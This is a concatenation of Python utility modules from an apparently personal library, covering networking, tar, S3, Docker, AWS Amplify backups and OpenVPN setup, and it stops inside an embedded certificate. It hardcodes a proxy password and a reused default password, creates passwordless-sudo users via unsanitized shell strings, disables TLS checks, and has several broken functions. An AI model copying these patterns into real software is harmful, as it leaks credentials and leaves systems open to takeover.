import socket
import time
from functools import reduce


def is_free_port():
    """
    获取可用端口
    Determines a free port using sockets.
    """
    free_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    free_socket.bind(('0.0.0.0', 0))
    free_socket.listen(5)
    port = free_socket.getsockname()[1]
    free_socket.close()
    return port


def assertTcpOpen(host, port, retries=100, retry_delay=2):
    retry_count = 0
    while retry_count <= retries:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        result = sock.connect_ex((host, port))
        sock.close()
        if result == 0:
            # print("Port is open")
            break
        else:
            # print("Port is not open, retrying...")
            time.sleep(retry_delay)


def chain_all(iter):
    """
    连接多个序列或字典
    :param iter:
    :return:
    """
    iter = list(iter)
    if not iter:
        return []
    if isinstance(iter[0], dict):
        result = {}
        for i in iter:
            result.update(i)
    else:
        result = reduce(lambda x, y: list(x) + list(y), iter)
    return result


def duplicate(iterable, keep=lambda x: x, key=lambda x: x, reverse=False):
    """
    保序去重
    :param iterable:
    :param keep: 去重的同时要对element做的操作
    :param key: 使用哪一部分去重
    :param reverse: 是否反向去重
    :return:
    """
    result = list()
    duplicator = list()
    if reverse:
        iterable = reversed(iterable)
    for i in iterable:
        keep_field = keep(i)
        key_words = key(i)
        if key_words not in duplicator:
            result.append(keep_field)
            duplicator.append(key_words)
    return list(reversed(result)) if reverse else result



# tar 归档文件实用工具
import logging
import os
import tarfile
from io import BytesIO

# from os.path import relpath
# from pathlib import Path

logger = logging.getLogger(__file__)
# def tarFolder(src, tar_name):
#     """创建tar.gz文件, 压缩包里面使用相对路径"""
#     """功能正常,但是暂时用不上,因为github本身就提供压缩包的下载"""
#     abs_src = os.path.abspath(src)
#     if not Path(tar_name).parent.exists():
#         Path(tar_name).parent.mkdir()
#     with tarfile.open(tar_name, "w:gz") as tar_handle:
#         for dirname, subdirs, files in os.walk(src):
#             for filename in files:
#                 absname = os.path.abspath(os.path.join(dirname, filename))
#                 arcname = absname[len(abs_src) + 1:]
#                 print('zipping %s as %s' % (os.path.join(dirname, filename),
#                                             arcname))
#                 tar_handle.add(absname, arcname)


def tarFolder(base_dir, fileObj):
    """
        将目录下的所有文件,生成归档格式,
        :fileObj 是类文件对象, 例如:可以是 BytesIO , 或者 普通 open()打开的的文件对象
        用法:
            bytesObj = BytesIO()
            tar_helper.tarFolder(str(current_dir),bytesObj)
            bytesObj.seek(0)"""
    tar_obj = tarfile.TarFile(fileobj=fileObj, mode='w')

    for dirname, subdirs, files in os.walk(base_dir):
        for filename in files:
            absname = os.path.abspath(os.path.join(dirname, filename))
            arc_name = absname[len(base_dir) + 1:]
            with open(os.path.abspath(os.path.join(dirname, filename)),
                      'rb') as f:
                file_bytes = f.read()

                tarinfo = tarfile.TarInfo(name=arc_name)
                tarinfo.size = len(file_bytes)
                # 可以设置文件的其他属性
                # tarinfo.mtime = time.time()
                # tarinfo.mode = 0600
                tar_obj.addfile(tarinfo, BytesIO(file_bytes))
                logger.debug('tar file add : %s ' % (filename))



import os
import random
import signal
import socket
import threading
import time
from datetime import datetime
from functools import wraps
from pathlib import Path
# import argparse
from urllib.parse import urlparse

# import netifaces
# import psutil
import requests


def wait_for_tcp(host, port, retries=100, retry_delay=2):
    """等待直到ip及端口能连接"""
    retry_count = 0
    while retry_count <= retries:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        result = sock.connect_ex((host, port))
        sock.close()
        if result == 0:
            # print("Port is open")
            break
        else:
            # print("Port is not open, retrying...")
            time.sleep(retry_delay)


def is_tcp_listen(port, ip='127.0.0.1'):
    """
        通过“连接” 的方式，确定端口是否listening
    """

    _ip, _port = ip, port

    if isinstance(port, str) and port.find(':') > 0:
        # 参数形如：127.0.0.1:80
        _ip = port.split(':')[0]
        _port = port.split(':')[1]

    _port = int(_port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((_ip, _port))
        s.shutdown(2)

        # print("port %s opened" % _port)
        return True
    except Exception as e:
        print(e)
        # print("port %s closed" % _port)
        return False

def get_tcp_open_port(port=0):
    """
        检查端口是否已经绑定
        端口写成0就可以,python会查找一个可用的tcp口绑定
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("",port))
        s.listen(1)
        port = s.getsockname()[1]
        s.close()
        return port
    except Exception as e:
        print(e)
        return None


def writefile(path, bin_content):
    """写文件，会自动创建上级路径（如果不存在）"""
    check_and_creat_dir(path)
    Path(path).touch()
    with open(path, 'wb') as f:
        f.write(bin_content)


def check_and_creat_dir(filepath):
    '''
    判断文件是否存在，文件路径不存在则创建文件夹
    注意：对于如此简单，又常用的功能，python应该本身有很优雅的函数实现，只是自己没找到而已。
    :param file_url: 文件路径，包含文件名
    :return:
    '''
    file_gang_list = filepath.split('/')
    if len(file_gang_list) > 1:
        [fname, fename] = os.path.split(filepath)
        print(fname, fename)
        if not os.path.exists(fname):
            os.makedirs(fname)
        else:
            return None
    else:
        return None


# def wait_for_tcp_v2(host, port, timeout_seconds=30):
#     """等待直到ip及端口能连接"""
#     @retry_wrapper(exception = ConnectionError,interval=2, retry_times=100)
#     def tcp_connect():
#         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#         result = sock.connect_ex((host, port))
#         sock.close()
#     tcp_connect()


def getIfaceByIp(ipaddv4):
    """查找绑定了此IP地址的网卡名称"""
    ifaces = [x for x in netifaces.interfaces() if x != 'lo']
    iface_ips = [(x, netifaces.ifaddresses(x)[netifaces.AF_INET][0]['addr'])
                 for x in ifaces]
    filtered = [x for x in iface_ips if x[1] == ipaddv4]
    if filtered:
        return filtered[0][0]
    return None


def getNetmaskbyIface(ifname):
    """根据网卡名获取子网"""
    iface = netifaces.ifaddresses(ifname)
    return iface[netifaces.AF_INET][0]['netmask']


def io_pip_thread(ioin, ioout):
    """
        启动新线程, 从in 流读取,并写入到out流
    """

    def t():
        read_bytes = ioin.read()
        while read_bytes:
            ioout.write(read_bytes)
            ioout.flush()
            read_bytes = ioin.read()

    threading.Thread(target=t, ).start()


def retry_wrapper(retry_times,
                  exception=Exception,
                  error_handler=None,
                  interval=0.1):
    """
    重试器，包装函数对指定异常进行重试
    函数重试装饰器
    :param retry_times: 重试次数
    :param exception: 需要重试的异常
    :param error_handler: 出错时的回调函数
    :param interval: 重试间隔时间
    :return:
    """

    def out_wrapper(func):

        @wraps(func)
        def wrapper(*args, **kwargs):
            count = 0
            while True:

                try:
                    return func(*args, **kwargs)
                except exception as e:
                    count += 1
                    if error_handler:
                        result = error_handler(func.__name__, count, e, *args,
                                               **kwargs)
                        if result:
                            count -= 1
                    if count >= retry_times:
                        raise
                    time.sleep(interval)

        return wrapper

    return out_wrapper


def timeout(timeout_time, default):
    """
    超时器，装饰函数并指定其超时时间
    Decorate a method so it is required to execute in a given time period,
    or return a default value.
    :param timeout_time:
    :param default:
    :return:
    """

    class DecoratorTimeout(Exception):
        pass

    def timeout_function(f):

        def f2(*args):

            def timeout_handler(signum, frame):
                raise DecoratorTimeout()

            old_handler = signal.signal(signal.SIGALRM, timeout_handler)
            # triger alarm in timeout_time seconds
            signal.alarm(timeout_time)
            try:
                retval = f(*args)
            except DecoratorTimeout:
                return default
            finally:
                signal.signal(signal.SIGALRM, old_handler)
            signal.alarm(0)
            return retval

        return f2

    return timeout_function


def call_later(callback, call_args=tuple(), immediately=True, interval=1):
    """
    应用场景：
    被装饰的方法需要大量调用，随后需要调用保存方法，但是因为被装饰的方法访问量很高，而保存方法开销很大
    所以设计在装饰方法持续调用一定间隔后，再调用保存方法。规定间隔内，无论调用多少次被装饰方法，保存方法只会
    调用一次，除非immediately=True
    :param callback: 随后需要调用的方法名
    :param call_args: 随后需要调用的方法所需要的参数
    :param immediately: 是否立即调用
    :param interval: 调用间隔
    :return:
    """

    def decorate(func):

        @wraps(func)
        def wrapper(*args, **kwargs):
            self = args[0]
            try:
                return func(*args, **kwargs)
            finally:
                if immediately:
                    getattr(self, callback)(*call_args)
                else:
                    now = time.time()
                    if now - self.__dict__.get("last_call_time", 0) > interval:
                        getattr(self, callback)(*call_args)
                        self.__dict__["last_call_time"] = now

        return wrapper

    return decorate


def get_ip():
    """
    获取局域网ip
    :return:
    """
    netcard_info = []
    info = psutil.net_if_addrs()
    for k, v in info.items():
        for item in v:
            if item[0] == 2 and not item[1] == '127.0.0.1':
                netcard_info.append((k, item[1]))

    if netcard_info:
        return netcard_info[0][1]


def ranstr(num):
    """生成随机字符"""
    # 猜猜变量名为啥叫 H
    H = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    ret = []
    for i in range(num):
        ret.append(random.choice(H))
    return ''.join(ret)


def proxyCheck(proxyurl, targetUrl='https://116.202.120.181/api/ip'):
    """
        检查代理服务是否有效，
        注意这里试用的是requests 的proxy url 方式的字符串。
        例如：  socks5h://mt:feihuo321@8.210.5.18:41080
                http://mt:feihuo321@8.210.5.18:8080
                https://abc.com
    """
    print("代理服务器，测活：{proxyurl}, ".format(proxyurl=proxyurl), flush=True)
    # uri = urlparse(proxyurl)

    # if uri.scheme == 'socks5':
    #     proxy_string = "socks5h://{user}:{password}@{host}:{port}".format(
    #         user=uri.username,
    #         password=uri.password,
    #         host=uri.hostname,
    #         port=uri.port
    #     )
    # elif uri.scheme == 'http' or uri.scheme == 'https':
    #     proxy_string = "{scheme}://{user}:{password}@{host}:{port}".format(
    #         scheme=uri.scheme,
    #         user=uri.username,
    #         password=uri.password,
    #         host=uri.hostname,
    #         port=uri.port
    #     )
    proxy_string = proxyurl
    try:
        response = requests.get(targetUrl,
                                proxies={
                                    "http": proxy_string,
                                    "https": proxy_string,
                                },
                                verify=False)
        print("响应", response.content)
        return True
    except Exception as e:
        print(e)
    return False


async def pipe(reader, writer):
    """流转发"""
    while True:
        if reader.at_eof():
            return
        data = await reader.read(4096)
        if (len(data) > 0):
            print('>:', len(data))
            writer.write(data)


def isInGitPod():
    """是否在gitpod中运行"""
    if os.environ.get('GITPOD_REPO_ROOT'):
        return True
    else:
        return False


def isInGhAction():
    """是否在github action 中运行"""
    if os.environ.get('GITHUB_RUN_ID'):
        return True
    else:
        return False


def getDataDir():
    """获取数据文件路径"""
    return Path(os.getcwd()).joinpath('data')


def add_ssh_authorized_keys(SSH_AUTHKEYS):
    """写入登陆公钥（仅限当前用户）"""
    Path.home().joinpath(".ssh").mkdir(mode=0o700)
    with open(Path.home().joinpath("/.ssh/authorized_keys")) as f:
        f.write(SSH_AUTHKEYS)
    Path(Path.home().joinpath("/.ssh/authorized_keys")).chmod(0o600)


def os_useradd(name="code"):
    """添加操作系统用户"""
    DEFAULT_PASSWORD = os.environ.get("DEFAULT_PASSWORD", "feihuo321")
    script = f"""sudo useradd -ms /bin/bash {name} \
&& echo "{name}:{DEFAULT_PASSWORD}" | sudo chpasswd \
&& echo {name} ALL=\\(root\\) NOPASSWD:ALL > /etc/sudoers.d/{name}
sudo chown -R ${name} /home/${name}/"""
    os.system(script)

    if (DEFAULT_PASSWORD):
        os.system(f"""echo "{name}:{DEFAULT_PASSWORD}" | sudo chpasswd""")

    SSH_AUTHKEYS = os.environ.get("SSH_AUTHKEYS")
    if SSH_AUTHKEYS:
        Path(f"/home/{name}/.ssh").mkdir(mode=0o700, exist_ok=True)
        open(f"/home/{name}/.ssh/authorized_keys").write(SSH_AUTHKEYS)
        Path(f"/home/{name}/.ssh/authorized_keys").chmod(0o600)


def init_sshd():
    """启动ssh服务时，需要设置用户默认密码和公钥"""
    authorized_keys = os.environ.get("SSH_AUTHKEYS")
    if authorized_keys:
        add_ssh_authorized_keys()



import os
import io
import boto3
from pathlib import Path
from botocore.exceptions import ClientError
# from . import aws_helper

AWS_REGION='us-east-1'
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
# def getInfoBykey(bucket, key):
#     """获取s3文件对象的信息（用于调试）

#     Args:
#         bucket (_type_): _description_
#         key (_type_): _description_
#     """
#     s3Res = aws_helper.getS3Resource() 
#     obj = s3Res.Object(bucket, key)
#     bytes = obj.get()['Body'].read()
    
def uploadFile_bytes(bucket, key, bytes, s3_client=None):
    """写入文件"""
    if not s3_client:
        s3_client = boto3.client("s3", region_name=AWS_REGION)
    with io.BytesIO() as f:
        f.write(bytes)
        f.seek(0)
        s3_client.upload_fileobj(f,bucket,key)
        
def uploadFile(bucket, key, file:str):
    """写入文件"""
    with io.BytesIO() as f:
        f.write(bytes)
        f.seek(0)
        s3_client = boto3.client("s3", region_name=AWS_REGION)
        s3_client.upload_file(f,bucket,key)
        
def downloadToLocal(bucket, key, saveFileToPath):
    """下载文件到本地"""
    s3_resource = boto3.resource("s3", region_name=AWS_REGION)
    s3_object = s3_resource.Object(bucket, key)
    Path(saveFileToPath).parent.mkdir(exist_ok=True)
    s3_object.download_file(saveFileToPath)
    
def download_dir(prefix, local, bucket, client=s3_client):
    """
    params:
    - prefix: pattern to match in s3
    - local: local path to folder in which to place files
    - bucket: s3 bucket with target contents
    - client: initialized s3 client object
    """
    keys = []
    dirs = []
    next_token = ''
    base_kwargs = {
        'Bucket':bucket,
        'Prefix':prefix,
    }
    # print("mark 1")
    while next_token is not None:
        kwargs = base_kwargs.copy()
        if next_token != '':
            kwargs.update({'ContinuationToken': next_token})
        results = client.list_objects_v2(**kwargs)
        contents = results.get('Contents')
        for i in contents:
            k = i.get('Key')
            if k[-1] != '/':
                keys.append(k)
            else:
                dirs.append(k)
        next_token = results.get('NextContinuationToken')
    for d in dirs:
        dest_pathname = os.path.join(local, d)
        if not os.path.exists(os.path.dirname(dest_pathname)):
            os.makedirs(os.path.dirname(dest_pathname))
    for k in keys:
        dest_pathname = os.path.join(local, k)
        if not os.path.exists(os.path.dirname(dest_pathname)):
            os.makedirs(os.path.dirname(dest_pathname))
        client.download_file(bucket, k, dest_pathname)

def upload_dir(dir, bucket, prefix='', session=None):
    if not session:
        session = boto3.Session()
    s3 = session.resource('s3')
    bucket = s3.Bucket(bucket)
 
    for subdir, dirs, files in os.walk(dir):
        for file in files:
            full_path = os.path.join(subdir, file)
            with open(full_path, 'rb') as data:
                key = prefix + full_path[len(dir)+1:]
                print(f"key={key}")
                bucket.put_object(Key=key, Body=data)
    
def copy_to_other_bucket(src, des, key):
    try:
        copy_source = {
            'Bucket': src,
            'Key': key
        }
        bucket = s3.Bucket(des)
        bucket.copy(copy_source, key)
    except Exception as e:
        print(e)
    
def delete(bucket, key):    
    s3_client = boto3.client("s3", region_name=AWS_REGION)    
    s3_client.delete_object(Bucket=bucket, Key=key)
    
# To check whether root bucket exists or not
def bucket_exists(bucket_name):
   try:
      session = boto3.session.Session()
      # User can pass customized access key, secret_key and token as well
      s3_client = session.client('s3')
      s3_client.head_bucket(Bucket=bucket_name)
      print("Bucket exists.", bucket_name)
      exists = True
   except ClientError as error:
      error_code = int(error.response['Error']['Code'])
      if error_code == 403:
         print("Private Bucket. Forbidden Access! ", bucket_name)
      elif error_code == 404:
        #  print("Bucket Does Not Exist!", bucket_name)
        pass
      exists = False
   return exists


import os
import tarfile
from io import BytesIO
from pathlib import Path
# import docker
import tar_helper


def isInContainer():
    return os.path.exists("/.dockerenv")

def is_docker():
    cgroup = Path("/proc/self/cgroup")
    return Path('/.dockerenv').is_file() or cgroup.is_file() and cgroup.read_text().find("docker") > -1

def copy_dir(container, local_dir, container_dir):
    """ 将本地文件或文件夹打包复制到容器内
        : container 容器实例
        : local_dir 本地文件夹路径
        : container_dir 容器文件夹路径F
    """
    bytesObj = BytesIO()
    tar_helper.tarFolder(local_dir, bytesObj)
    bytesObj.seek(0)
    # 参考:https://gist.github.com/michaelconnor00/b3c332a2d6b70f6443d33459d3a731aa
    container.exec_run("mkdir {}/".format(container_dir))
    container.put_archive(container_dir, bytesObj.getvalue())


def copy_file(container, targetPath, bytes):
    """
        将二进制文件写入容器
        : targetPath : 容器内的绝对路径

        注意,目前只支持单文件, 如果需要同时传多个文件,可以变通为先打包为tar,传上去后自己解压.
    """
    _parent_dir = str(Path(targetPath).parent)
    _file_name = Path(targetPath).name

    # 创建文件夹
    container.exec_run("mkdir {}".format(_parent_dir))

    bytesObj = BytesIO()
    tar_obj = tarfile.TarFile(fileobj=bytesObj, mode='w')
    tarinfo = tarfile.TarInfo(name=_file_name)
    tarinfo.size = len(bytes)
    # 可以设置文件的其他属性
    # tarinfo.mtime = time.time()
    # tarinfo.mode = 0600
    tar_obj.addfile(tarinfo, BytesIO(bytes))
    bytesObj.seek(0)

    container.put_archive(_parent_dir, bytesObj.getvalue())




import ipaddress
import proxy

def on_command(args):
    """显示内部信心"""
    print('proxy====')
    proxy.main(
        # hostname=ipaddress.IPv6Address('::1'),
        hostname=ipaddress.IPv4Address('0.0.0.0'),
        port=8899
    )




from flask import Flask



def on_command(args):
    # 实例化，可视为固定格式
    app = Flask(__name__)
    # route()方法用于设定路由；类似spring路由配置
    @app.route('/helloworld')
    def hello_world():
        return 'Hello, World!'

    app.run(host="0.0.0.0", port=5000)




import boto3
import os
from PIL import Image
import pathlib
from io import BytesIO
from pathlib import Path
import pathlib
# from zappa.asynchronous import task
import requests

class S3ImageVariant():
    """_summary_
    """

    def __init__(self, src_bucket, dest_bucket=None, src_prifix="", dest_prifix="images/"):
        """_summary_

        Args:
            src_bucket (_type_): _description_
            dest_bucket (_type_, optional): _description_. Defaults to None.
            src_prifix (str, optional):  "".
            dest_prifix (str, optional): _description_. Defaults to "images/".
        """
        if not src_bucket or not src_prifix.endswith("/"):
            raise Exception("需要正确设置路径前缀，如: original_images/")
        elif src_prifix == dest_prifix and src_bucket == dest_bucket:
            raise Exception("同一个bucket的情况下，目标前缀和源前缀不能相同")
        else:
            self.src_bucket = src_bucket
            self.dest_bucket = dest_bucket or self.src_bucket
            self.s3_client = boto3.client('s3')
            self.s3 = boto3.resource('s3')
            self.src_prifix = src_prifix
            self.dest_prifix = dest_prifix

    def resize_image(self, src_key, dest_key, size):
        print(f"开始转换图片，源key: {src_key} -> {dest_key}" )
        in_mem_file = BytesIO()
        
        s3Object = self.s3_client.get_object(
            Bucket=self.src_bucket, Key=src_key)

        content_type = s3Object['ContentType']
        if 'image/jpeg' != content_type:
            print(f"不是图片，跳过处理 content_type : {content_type}")
        else:
            file_byte_string = s3Object['Body'].read()
            im = Image.open(BytesIO(file_byte_string))
            im.thumbnail(size, Image.ANTIALIAS)
            # ISSUE : https://stackoverflow.com/questions/4228530/pil-thumbnail-is-rotating-my-image
            im.save(in_mem_file, format=im.format)
            in_mem_file.seek(0)

            response = self.s3_client.put_object(
                Body=in_mem_file,
                Bucket=self.dest_bucket,
                Key=dest_key
            )

    def onCreateObject(self, key):
        """lambda  入口"""
        size1 = (200, 200)
        # url字符转换
        _src_key = requests.utils.unquote(key)
        
        if key.startswith(self.src_prifix):
            realKey = key[len(self.src_prifix):]
            dest_key = requests.utils.unquote(self.dest_prifix + realKey+f".{size1[0]}x{size1[1]}")
            self.resize_image(
                src_key=_src_key,
                dest_key=dest_key,
                size=size1)




import boto3
from gql import gql, Client
# from gql.transport.aiohttp import AIOHTTPTransport
import time
import datetime
import json
from pathlib import Path

import logging
logger = logging.getLogger(__name__)


amplifybackent_client = boto3.client('amplifybackend')

backupDir = Path('xxbackup/')

def datetimeconverter(o):
    if isinstance(o, datetime.datetime):
        return str(o)


class AmplifyApp():
    def __init__(self, appId, appEnvName):
        self.appId = appId
        self.appEnvName = appEnvName

        backend_response = amplifybackent_client.get_backend(AppId=self.appId, BackendEnvironmentName=self.appEnvName)
        self.amplifyMetaConfig = json.loads(backend_response['AmplifyMetaConfig'])

        [(k, v)] = self.amplifyMetaConfig["storage"].items()
        output = v["output"]
        self.bucketName = output["BucketName"]
        
        [(k, v)] = self.amplifyMetaConfig["auth"].items()
        self.userPoolId = v['output']['UserPoolId']
        self.cognito_idp_client = boto3.client('cognito-idp')

        self.session = boto3.Session(
            # aws_access_key_id='<your_access_key_id>',
            # aws_secret_access_key='<your_secret_access_key>'
        )
        self.s3 = self.session.resource('s3')
        self.bucket  = self.s3.Bucket(self.bucketName)


    def debug_showAmplifyAppInfo(self):
        """显示"""
        backend_response = amplifybackent_client.get_backend(AppId=self.appId, BackendEnvironmentName=self.appEnvName)

        self.amplifyMetaConfig = json.loads(backend_response['AmplifyMetaConfig'])
        # print(self.amplifyMetaConfig)

    async def s3_put_object(self,key,content):
        object = self.s3.Object(self.bucketName, key)
        return object.put(Body=content)
 

    def getGraphqlApiEndPoint(self):
        backend_response = amplifybackent_client.get_backend(AppId=self.appId, BackendEnvironmentName=self.appEnvName)
        amplifyMetaConfig = json.loads(backend_response['AmplifyMetaConfig'])
        graphqlApi = [v for key, v in amplifyMetaConfig['api'].items() if v["service"] == "AppSync"][:1]

        # 获取 graphql url 和 apikey
        return {
            "GraphQLAPIEndpointOutput": graphqlApi[0]['output']['GraphQLAPIEndpointOutput'],
            "GraphQLAPIKeyOutput": graphqlApi[0]['output']['GraphQLAPIKeyOutput'],
            "GraphQLAPIIdOutput": graphqlApi[0]['output']['GraphQLAPIIdOutput'],

        }

    async def graphqlQuery(self, query):
        graphqlApiOutput = self.getGraphqlApiEndPoint()
        transport = AIOHTTPTransport(url=graphqlApiOutput["GraphQLAPIEndpointOutput"],
                                     headers={
            "x-api-key": graphqlApiOutput["GraphQLAPIKeyOutput"]
        })
        async with Client(
            transport=transport,
            fetch_schema_from_transport=True,
        ) as session:
            query = gql(query)
            return await session.execute(query)

    async def _listStorageKeys(self):
        """
            试验：列出 s3中的文件。
        """
        [(k, v)] = self.amplifyMetaConfig["storage"].items()
        output = v["output"]
        bucketName = output["BucketName"]
        Region = output["Region"]

        s3 = boto3.resource('s3')
        bucket = s3.Bucket(bucketName)
        for obj in bucket.objects.all():
            print(obj.key)
        # print(bucketName,Region)

    async def export_ddb(self):
        """ 导出数据库到s3"""
        graphqlApiOutput = self.getGraphqlApiEndPoint()
        apiId = graphqlApiOutput["GraphQLAPIIdOutput"]
        dynamodb = boto3.resource('dynamodb', region_name='us-east-1')
        tables = list(dynamodb.tables.all())
        appTables = [v for v in tables if v.name.endswith(f"-{apiId}-{self.appEnvName}")]

        logger.info(f"准备备份数据库到{self.bucketName}")
        for table in appTables:
            if table.item_count <= 0:
                print(f"无数据，跳过备份 {table.name}")
            else:
                print("准备备份：{table.name}-count:{table.item_count}")
                # print(appTables)
                response = table.scan()
                data = response['Items']

                while 'LastEvaluatedKey' in response:
                    response = table.scan(ExclusiveStartKey=response['LastEvaluatedKey'])
                    data.extend(response['Items'])

                strData=time.strftime("%Y%m%d")
                  
                tableName2=table.name[:-len(f"-{apiId}-{self.appEnvName}")]
                s3key = f"{backupDir}/ddb/{strData}/{tableName2}"
                content = json.dumps(data,indent=2)
                await self.s3_put_object(s3key,content)
                logger.info(f"完成：size:{len(content)},{s3key}")

    async def import_ddb(self):
        """从s3导入数据库"""
        # response = self.s3.list_objects_v2(Bucket=self.bucketName, Prefix= f"{backupDir}/ddb/")
        s3Objects = self.bucket.objects.filter(Prefix=f"{backupDir}/ddb/")
        # s3Objects = self.bucket.objects.all()
        for object in s3Objects:
            srcKey = object.key
            logger.info(f"key:{object.key}")

    async def _list_cognito_users(self, next_pagination_token='', Limit=60):
        [(k, v)] = self.amplifyMetaConfig["auth"].items()
        userPoolId = v['output']['UserPoolId']
        AppClientIDWeb = v['output']['AppClientIDWeb']
        appClientID = v['output']['AppClientID']
        identityPoolId = v['output']['IdentityPoolId']

        # cognito_idp_client = boto3.client('cognito-idp')
        # userPoolId = v['output']['UserPoolId']
        response = self.cognito_idp_client.list_users(
            UserPoolId=userPoolId,
            #AttributesToGet = ['name'],
            Limit=Limit,
            PaginationToken=next_pagination_token
        ) if next_pagination_token else self.cognito_idp_client.list_users(
            UserPoolId=userPoolId,
            #AttributesToGet = ['name'],
            Limit=Limit
        )
        return response["Users"]

    def addUser(self, username, password, userAttributes):
        # sub 不能设置
        _userAttributes = [v for v in userAttributes if v["Name"] != "sub"]
        response = self.cognito_idp_client.admin_create_user(
            UserPoolId=self.userPoolId,
            Username=username,
            UserAttributes=_userAttributes,
            # ValidationData=[
            #     {
            #         'Name': 'string',
            #         'Value': 'string'
            #     },
            # ],
            TemporaryPassword='888888abc',
            ForceAliasCreation=False,
            # MessageAction='RESEND'|'SUPPRESS',
            # DesiredDeliveryMediums=[
            #     'EMAIL',
            # ],
            # ClientMetadata={
            #     'string': 'string'
            # }
        )
        response2 = self.cognito_idp_client.admin_set_user_password(
            UserPoolId=self.userPoolId,
            Username=username,
            Password=password,
            Permanent=True
        )

    async def getUser(self, username: str):
        # cognito_idp_client = boto3.client('cognito-idp')
        try:
            response = self.cognito_idp_client.admin_get_user(
                UserPoolId=self.userPoolId,
                Username=username
            )
            return response
        except self.cognito_idp_client.exceptions.UserNotFoundException as e:
            return None

    # async def userExists(self, username:str) -> bool:
    #     user = await self.getUser(username)
    #     # print(user)
    #     return user.get("Username",None)

    def datetimeconverter(o):
        if isinstance(o, datetime.datetime):
            return str(o)

    async def export_users(self):
        """
            导出用户，目前测试阶段，仅处理第一页
        """
        [(k, v)] = self.amplifyMetaConfig["auth"].items()
        userPoolId = v['output']['UserPoolId']
        users = await self._list_cognito_users()
        jsonStr = json.dumps(users, indent=4, default=datetimeconverter)
        # 导出到本机文件
        exportTo = Path(backupDir).joinpath(userPoolId, "user.export.json")
        # Path(exportTo).parent.mkdir(exist_ok=True)
        # with open(exportTo, 'w') as f:
        #     f.write(jsonStr)

        # 导出到amplify自带的s3存储
        s3Key = str(exportTo)
        logger.info(f"total users: {len(users)},  backup file size: {len(jsonStr)}, \nexport to: {s3Key}")
        await self.s3_put_object(s3Key,jsonStr)


    async def import_users(self):
        """
            导入用户，目前测试阶段，仅处理第一页
        """
        [(k, v)] = self.amplifyMetaConfig["auth"].items()
        userPoolId = v['output']['UserPoolId']
        file = Path(backupDir).joinpath(userPoolId, "user.export.json")
        with open(file, 'r') as f:
            userlist = json.loads(f.read())
            for u in userlist:
                username = u["Username"]
                if await self.getUser(username):
                    logger.info("用户存在，跳过导入")
                else:
                    logger.info("导入用户 %s" % u["Username"])
                    password = "feihuo321"
                    userAttributes = u["Attributes"]
                    self.addUser(username, password, userAttributes)

    async def export_all(self):
        """
            导出所有数据到s3中，（目前仅包含数据库和用户资料。）
        """
        logger.info("☀️开始导出用户资料")
        await self.export_users()
        logger.info("☀️开始导出数据库")
        await self.export_ddb()



import boto3
def create_dax_table(dyn_resource=None):
    """
    范例：创建 dynamodb table

    :param dyn_resource: Either a Boto3 or DAX resource.
    :return: The newly created table.
    """
    if dyn_resource is None:
        dyn_resource = boto3.resource('dynamodb')

    table_name = 'TryDaxTable'
    params = {
        'TableName': table_name,
        'KeySchema': [
            {'AttributeName': 'partition_key', 'KeyType': 'HASH'},
            {'AttributeName': 'sort_key', 'KeyType': 'RANGE'}
        ],
        'AttributeDefinitions': [
            {'AttributeName': 'partition_key', 'AttributeType': 'N'},
            {'AttributeName': 'sort_key', 'AttributeType': 'N'}
        ],
        'ProvisionedThroughput': {
            'ReadCapacityUnits': 10,
            'WriteCapacityUnits': 10
        }
    }
    table = dyn_resource.create_table(**params)
    print(f"Creating {table_name}...")
    table.wait_until_exists()
    return table


import asyncio
import logging
import os
import shlex
import subprocess
import tempfile
import traceback
from mtlibs import mtutils, process_helper
from mtlibs.mtutils import ranstr
logger = logging.getLogger(__name__)
class OpenvpnClientProc():
    """
        openvpn 客户端进程
        可以考虑整个ovpn从yml config这里整个填写，而不用分开host port proto key 等信息。:
    """

    def __init__(self, ovpn):
        self.tmpdirname = tempfile.gettempdir() + "/openvpn_" + ranstr(20)
        self.ovpn = ovpn
        # self.host = host
        # self.port = port
        # self.proto= proto
        # self.key=key

    def write_openvpnconfig(self):
        self.pki_base_path = os.path.abspath("./data/openvpn/pki")
        self.ccd_path = os.path.abspath("./data/openvpn/ccd")
        self.openvpn_config_path = self.tmpdirname + "/openvpn.conf"
        mtutils.writefile(self.openvpn_config_path, self.ovpn.encode())
        # client1.ovpn


#         mtutils.writefile(self.openvpn_config_path,"""
# client
# nobind
# dev tun
# remote-cert-tls server
# <key>
# {key}
# </key>
# <cert>
# -----BEGIN CERTIFICATE-----
# MIIDVTCCAj2gAwIBAgIQfjDxXG3QojWJqt/yHJTZbjANBgkqhkiG9w0BAQsFADAW
# MRQwEgYDVQQDDAtFYXN5LVJTQSBDQTAeFw0yMTA1MjcwOTUxNTlaFw0yMzA4MzAw
# OTUxNTlaMBIxEDAOBgNVBAMMB2NsaWVudDEwggEiMA0GCSqGSIb3DQEBAQUAA4IB
# DwAwggEKAoIBAQCkduSZA+yMcpDNj2tvAToDkZNn4as0w7VQr6Rtk+J6UJeMX/ey
# wNUGrmUkBvwlJRp5hfZiummFSwhr1T7/mXawkLvtJW7z+cRyPPEeUZ7HclC0GTp8
# xbELfdI6wxPoezI5faGg8Qep5KR4kJuU8FQ1B7QxNkVP8Owu/CazRRuELG0QssIs
# vPXIEgXs1jAUNT8HvU39ARHIdzhnRtELUqW0vKae6paDSRklYyxqaUt6po+xaJQ2
# 2xkEagU+R6rDzwhyNEOnNyfKRj9PCsOACTou1IxZGBuSRE2VBaMgmMevygSS1XkC
# fPHBFcbrjw7fiOX4KWdV2RlCIRCgI7uHtrUJAgMBAAGjgaIwgZ8wCQYDVR0TBAIw
# ADAdBgNVHQ4EFgQUFrj/q3NsCq7jvLK+xxLIw/vvR8UwUQYDVR0jBEowSIAUiyDv
# HnmqCFSDiba2OLD7PngWoWKhGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghR5
# fHYry44n8OdznFdjjDbP5ng+vTATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8E
